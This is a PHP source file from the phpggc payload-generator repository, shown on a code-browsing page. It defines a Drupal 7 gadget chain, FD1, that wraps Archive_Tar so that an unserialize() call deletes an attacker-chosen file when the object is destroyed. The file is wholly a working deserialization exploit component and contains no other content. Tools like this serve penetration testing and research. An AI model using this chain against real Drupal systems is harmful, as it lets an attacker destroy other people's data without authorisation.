Codebase list phpggc / 9a88393 gadgetchains / Drupal7 / FD / 1 / chain.php
9a88393

Tree @9a88393 (Download .tar.gz)

chain.php @9a88393raw · history · blame

<?php

namespace GadgetChain\Drupal7;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '7.0 < ?';
    public static $vector = '__destruct';
    public static $author = 'rreiss';
    public static $information = '
        Note that some files may not be removed (depends on permissions)
    ';

    public function generate(array $parameters)
    {
        return new \Archive_Tar($parameters['remote_file']);
    }
}